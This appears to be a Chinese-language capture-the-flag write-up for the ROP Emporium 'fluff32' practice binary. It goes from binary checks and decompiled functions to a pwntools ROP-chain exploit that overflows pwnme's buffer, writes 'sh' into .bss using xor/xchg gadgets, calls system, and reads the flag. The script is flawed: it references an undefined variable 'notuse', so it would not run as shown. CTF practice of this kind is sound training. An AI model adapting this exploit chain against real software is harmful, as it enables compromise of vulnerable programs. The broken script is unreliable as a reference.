检查
root@MSI:/mnt/xxx/06_fluff32# tree
.
├── flag.txt
└── fluff32
0 directories, 2 files
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[0x08048480]> iz
[Strings]
nth paddr vaddr len size section type string
―――――――――――――――――――――――――――――――――――――――――――――――――――――――
0 0x00000720 0x08048720 21 22 .rodata ascii fluff by ROP Emporium
1 0x00000736 0x08048736 7 8 .rodata ascii 32bits\n
2 0x0000073e 0x0804873e 8 9 .rodata ascii \nExiting
3 0x00000748 0x08048748 71 72 .rodata ascii You know changing these strings means I have to rewrite my solutions...
4 0x00000793 0x08048793 7 8 .rodata ascii /bin/ls
2.1函数
[0x08048480]> afl
0x08048480 1 33 entry0
0x08048440 1 6 sym.imp.__libc_start_main
0x080484c0 4 43 sym.deregister_tm_clones
0x080484f0 4 53 sym.register_tm_clones
0x08048530 3 30 entry.fini0
0x08048550 4 43 -> 40 entry.init0
0x080485f6 1 86 sym.pwnme
0x08048460 1 6 sym.imp.memset
0x08048420 1 6 sym.imp.puts
0x08048400 1 6 sym.imp.printf
0x08048410 1 6 sym.imp.fgets
0x0804864c 1 25 sym.usefulFunction
0x08048430 1 6 sym.imp.system
0x08048700 1 2 sym.__libc_csu_fini
0x080484b0 1 4 sym.__x86.get_pc_thunk.bx
0x08048704 1 20 sym._fini
0x080486a0 4 93 sym.__libc_csu_init
0x0804857b 1 123 main
0x08048450 1 6 sym.imp.setvbuf
0x080483c0 3 35 sym._init
2.2
- main
int __cdecl main(int argc, const char **argv, const char **envp)
{
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
puts("fluff by ROP Emporium");
puts("32bits\n");
pwnme();
puts("\nExiting");
return 0;
}
- pwnme
char *pwnme()
{
char s; // [esp+0h] [ebp-28h]
memset(&s, 0, 0x20u);
puts("You know changing these strings means I have to rewrite my solutions...");
printf("> ");
return fgets(&s, 512, stdin);
}
栈溢出
- usefulFunction
int usefulFunction()
{
return system("/bin/ls");
}
3.1EXP
from pwn import *
#context.log_level = "debug"
p = process("./fluff32")
pop_ebx_ret = 0x080483e1
mov_ecx_edx = 0x08048692
xchg_edx_ecx = 0x08048689
xor_edx_ebx = 0x0804867b
xor_edx_edx = 0x08048671
call_system = 0x08048430
bss_addr = 0x0804A040
binsh = "sh\x00\x00"
junk = "a" * 4
payload = "a" * 44
payload += p32(pop_ebx_ret)
payload += p32(bss_addr)
payload += p32(xor_edx_edx)
payload += junk
payload += p32(xor_edx_ebx)
payload += junk
payload += p32(xchg_edx_ecx)
payload += junk
# mov sh to edx
payload += p32(pop_ebx_ret)
payload += binsh
payload += p32(xor_edx_edx)
payload += junk
payload += p32(xor_edx_ebx)
payload += notuse
# mov sh to bss_addr (mov [ecx], edx)
payload += p32(mov_ecx_edx)
payload += junk* 2
payload += p32(0)
#call system
payload += p32(call_system)
payload += p32(0)
payload += p32(bss_addr)
p.sendline(payload)
p.interactive()
3.2效果
[+] Starting local process './fluff32': pid 71
[*] Switching to interactive mode
fluff by ROP Emporium
32bits
You know changing these strings means I have to rewrite my solutions...
> $ cat flag.txt
ROPE{a_placeholder_32byte_flag!}
